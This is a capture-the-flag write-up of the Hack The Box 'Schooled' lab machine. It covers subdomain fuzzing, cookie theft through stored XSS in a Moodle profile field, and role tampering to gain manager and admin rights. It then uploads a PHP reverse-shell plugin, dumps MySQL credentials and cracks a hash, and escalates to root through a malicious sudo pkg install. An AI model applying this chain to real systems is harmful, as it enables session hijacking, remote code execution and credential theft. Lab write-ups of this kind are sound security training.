Schooled HTB -Write-up
So, in this blog, we’ll see a walk-through or write-up of a machine-schooled hack the box machine, and we’ll gain user and root access.
The first step, as is typical, is to use nmap to scan for open ports.
nmap -sC -sV 10.10.10.234
Our target has two ports open, according to the Nmap results — So lets check the Website running on it -
We don’t discover anything interesting here, so let’s use the ffuf tool to enumerate the possible sub-domains.
ffuf -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -u http://schooled.htb/ -H ‘Host: FUZZ.schooled.htb’ -fs 20750
So we discovered a subdomain called “moodle” and to check it out, we need to add moodle.schooled.htb to the /etc/hosts file. While browsing to the subdomain, I discovered that Moodle is a PHP-based learning management system that is free and open-source. Now lets go to moodle.schooled.htb here we need to create a account and log in. So create a account -
We are now signed in, but we have restricted rights, therefore we need to figure out how to gain privileges while surfing I came upon a post from the owner that will help. (enroll yourself in mathematics course)
This announcement is interesting since it mentions our teacher’s ‘MoodleNet’ profile. This is where our XSS payload will be injected. This teacher will go at the profiles of students who sign up for his class. This guy’s commitment is amazing. We can take his cookie and use it to break into his session!
Now go to profile and look for the edit option. This is where we can see MoodleNet’s profile.
Now first run a http server by —
python3 -m http.server 8000
The payload I used to catch the teachers’ cookie is:
Now after this you will get cookie
Now use this cookie you will be successfully logged in as Manuel Phillips
So, to make this attack work, we’ll need to figure out how to submit a zip file containing a PHP file that will be installed as a plugin. However, greater rights within the system are required to do this. Let’s get started with the next steps.
Here we see Lianne Carter is Manager so we can manually add Lianne as a user and Intercept the request and set the role id and user role to 24 and 1. Our privileges will be elevated as a result of this.
Now we have to again add Lianne as manager -
Now Lianne will be enrolled as a manager and we can log in as admin
After logging in, we’ll see a site administration option.
Go to Users, Define Roles, and Edit, then turn on Burpsuit and Capture this Request in Burpsuit by clicking the Save Change button.
Before that you should be careful you want to remove which is starting from “&return” You can get that script here — gestyy.com/epeLtu
After this go to plugins now we can add a plugin that is a php reverse shell -
Here from this link download rce file — gestyy.com/epeLtu
Extract it change the PHP code with your PHP backdoor you can find it here — http://gestyy.com/epeLcd
Copy the code from second file change your IP there and paste it in first file archive it in .zip format select block option and finally upload it. Now listen for the connection on using nc -lvnp 1234 and visit http://moodle.schooled.htb/moodle/blocks/rce/lang/en and click on the uploaded file.
Now we got a connection here go to cd /usr/local/www/apache24/data/moodle and we can see a file config.php lets see it using cat config.php . The credentials for MySQL were stored in this file. We were able to enumerate the database for password hashes as a result of this.
/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -D moodle -e “select * from mdl_user;”
Using this command we got a hash for a user Jamie, copy that hash and paste into our local machine now lets crack it using hashcat — hashcat -m 3200 -a 3 hash.txt /wordlist/rockyou.txt
Finally we cracked the hash and got password for the user Jamie -
Now lets use — ssh jamie@schooled.htb to get connection.
Lets check what we can do to get root access by checking sudo -l
The results inform that it turns out that Jamie is allowed to run sudo on the following binaries:
/usr/sbin/pkg update
/usr/sbin/pkg install *
Lets cd into tmp and create a folder by mkdir payload
Based on following article — http://gestyy.com/epeL64 we can create a payload
Now create a file using nano payload.sh and paste the payload in it (Change the ip address )
Now, chmod 777 payload.sh and execute it; you should notice a new pkg generated after doing so run
nc -lnvp 8081 and finally last command sudo pkg install -y -no-repo-update mypackage-”1.0.5".txt
And we are root!!
I hope you understood everything if have any hope you understood everything; if you have any questions, please leave a comment below…..
